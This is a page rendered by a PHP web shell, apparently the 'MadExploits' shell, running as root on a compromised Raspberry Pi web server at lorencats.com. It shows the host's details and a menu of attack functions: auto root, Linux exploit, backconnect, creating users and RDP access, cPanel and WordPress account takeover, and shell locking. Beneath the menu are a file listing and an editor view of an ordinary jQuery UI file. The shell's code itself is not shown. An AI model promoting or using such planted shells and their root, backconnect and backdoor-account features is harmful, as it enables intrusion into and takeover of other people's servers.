Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
javascript /
jquery-ui /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
effects
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
core.js
341
B
-rw-r--r--
core.min.js
239
B
-rw-r--r--
data.js
903
B
-rw-r--r--
data.min.js
331
B
-rw-r--r--
disable-selection.js
1.03
KB
-rw-r--r--
disable-selection.min.js
444
B
-rw-r--r--
effect.js
39.84
KB
-rw-r--r--
effect.min.js
22.64
KB
-rw-r--r--
escape-selector.js
475
B
-rw-r--r--
escape-selector.min.js
300
B
-rw-r--r--
focusable.js
2.21
KB
-rw-r--r--
focusable.min.js
1.08
KB
-rw-r--r--
form-reset-mixin.js
1.75
KB
-rw-r--r--
form-reset-mixin.min.js
932
B
-rw-r--r--
form.js
551
B
-rw-r--r--
form.min.js
229
B
-rw-r--r--
ie.js
356
B
-rw-r--r--
ie.min.js
198
B
-rw-r--r--
jquery-1-7.js
2.47
KB
-rw-r--r--
jquery-1-7.min.js
1.08
KB
-rw-r--r--
keycode.js
790
B
-rw-r--r--
keycode.min.js
296
B
-rw-r--r--
labels.js
1.67
KB
-rw-r--r--
labels.min.js
608
B
-rw-r--r--
plugin.js
991
B
-rw-r--r--
plugin.min.js
591
B
-rw-r--r--
position.js
14.53
KB
-rw-r--r--
position.min.js
9.49
KB
-rw-r--r--
safe-active-element.js
984
B
-rw-r--r--
safe-active-element.min.js
397
B
-rw-r--r--
safe-blur.js
493
B
-rw-r--r--
safe-blur.min.js
244
B
-rw-r--r--
scroll-parent.js
1.22
KB
-rw-r--r--
scroll-parent.min.js
645
B
-rw-r--r--
tabbable.js
853
B
-rw-r--r--
tabbable.min.js
338
B
-rw-r--r--
unique-id.js
947
B
-rw-r--r--
unique-id.min.js
379
B
-rw-r--r--
version.js
293
B
-rw-r--r--
version.min.js
158
B
-rw-r--r--
widget.js
19.29
KB
-rw-r--r--
widget.min.js
11.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scroll-parent.js
/*! * jQuery UI Scroll Parent 1.12.1 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */ //>>label: scrollParent //>>group: Core //>>description: Get the closest ancestor element that is scrollable. //>>docs: http://api.jqueryui.com/scrollParent/ ( function( factory ) { if ( typeof define === "function" && define.amd ) { // AMD. Register as an anonymous module. define( [ "jquery", "./version" ], factory ); } else { // Browser globals factory( jQuery ); } } ( function( $ ) { return $.fn.scrollParent = function( includeHidden ) { var position = this.css( "position" ), excludeStaticParent = position === "absolute", overflowRegex = includeHidden ? /(auto|scroll|hidden)/ : /(auto|scroll)/, scrollParent = this.parents().filter( function() { var parent = $( this ); if ( excludeStaticParent && parent.css( "position" ) === "static" ) { return false; } return overflowRegex.test( parent.css( "overflow" ) + parent.css( "overflow-y" ) + parent.css( "overflow-x" ) ); } ).eq( 0 ); return position === "fixed" || !scrollParent.length ? $( this[ 0 ].ownerDocument || document ) : scrollParent; }; } ) );
Close